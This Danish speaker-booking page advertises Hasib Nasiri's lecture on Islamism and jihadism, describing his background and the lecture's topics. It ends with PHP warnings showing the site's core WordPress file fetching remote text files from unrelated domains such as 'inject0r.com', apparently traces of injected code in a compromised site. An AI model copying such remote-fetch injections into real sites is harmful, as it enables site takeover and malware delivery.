img-us
  • asc

    Foredragsholder Hasib Nasiri

  • asc

    Emne Politisk islam

  • asc

    pris 5000.-

Politisk islam - islam, islamisme og jihadisme:
Hasib Nasiri er født i Afghanistan, opvokset i Iran og flygtet til Danmark i 2004. Denne personlige rejse har budt på mange brud og omvæltninger, forårsaget af forskellige måder at anskue politik på.

Fra Kabul og slut 90ernes borgerkrig og anarki, til islamistisk totalitarisme og en tilværelse som flygtning og andenrangsborger i Teheran, til Vordingborg og mødet med et liberalt demokrati.

Denne rejse har skabt en undren og nysgerrighed for at udforske ideologiers betydning for samfundets indretning og menneskets selvopfattelse. Denne undren har ført til en kandidatgrad i filosofi med speciale i politisk teori og islamiske studier.

Det paradoksale for nuværende er, at debatten er præget af en udpræget mangel på nuance og viden om islamisme og jihadisme, selv i et demokratisk samfund som det danske med ubegrænset adgang til viden: Hvordan kan denne mangel på nuance i debatten imødekommes?

Beskrivelse af foredrag:
Islamisme og jihadisme er nyskabelser og tilhører moderne islamisk politisk tænkning. Det er vigtigt at have for øje, at islamister referer til Koranen og religionen islam som inspirationskilde. Men det er endnu vigtigere at have in mente, at islamisme som bevægelse blot er en ud af mange eksisterende skoler i moderne islamisk politisk tænkning - udover islamisk modernisme, islamisk nationalisme og post-islamisme.

Hasib Nasiri vil lige netop derfor pille islamismen fra hinanden lag for lag, for at forstå bevægelsen, men også for at placere den i relation til de andre eksisterende skoler. Den manglende erkendelse af netop denne nuance har forringet kvaliteten af debatten omkring islam, islamisme og jihadisme.

Besvarelse af nedenstående spørgsmål kan bidrage til nuancering af debatten:
- Historiografi: hvornår opstår islamisme som bevægelse?
- Biografi: hvem er islamismens hovedpersoner?
- Bibliografi: hvad er islamismens hovedværker?
- Institutionalisering: hvornår bliver islamisme institutionaliseret?
- Koranfortolkning: hvordan læses og forstås Koranen af islamister?
- Centrale dogmer: hvad er islamismens centrale begreber og dogmer?
- Radikalisering: hvornår bliver islamisme radikaliseret som ideologi?
- Voldsparathed: hvordan legitimerer islamister og jihadister deres militarisme?
- Antisemitisme: er islamisme antisemitisk?
- Fjendebilleder: hvem er fjenderne og hvordan betragtes de?

Foredrag: Islamismens fædre - grundlæggelse og institutionalisering
Hasib Nasiri vil opdele islamisme som bevægelse i 2 dele: den første tilhørende starten af det 20. århundrede frem til 1940erne, og den anden tilhørende 1950erne frem til 1980erne.

Den første fase vil blive betegnet som grundlæggelsesfasen (institutionalisering af islamisme), og den anden fase som radikaliseringsfasen (overgangen til militant islamisme).

Udbytte af foredrag:
Hasib Nasiri har en unik forståelse for politiske ideologier, en forståelse, der er en syntese mellem livserfaring og omfattende teoretiske studier. I og med han har levet under 3 forskellige styrerformer med de deraf følgende personlige konsekvenser - sammenlagt med filosofisk og religionsvidenskabelig forskningsbaseret viden - kan deltagere i foredraget forhåbentligt komme ud med en overordnet forståelse for islamisme og jihadisme.

Et andet problem i debatten om emnet er, at de såkaldte islamkritikere oftest ikke ved nok om fænomenet. Men da kritik forudsætter viden, er det essentielt med nuancerne, hvis man overhovedet skal kunne forholde sig kritisk til islam! Overordnet set er udbyttet af foredragende følgende:
- Et nuanceret billede af islamisme som bevægelse og verdensanskuelse.
- Forståelse af islamisme og jihadisme hinsides godt og ondt.
- Diagnosticering af islamismes radikalitet.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Torben Rif

Maria Merrild

Andreas Øster (Mr. Chairman)

Henriette Wilson


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22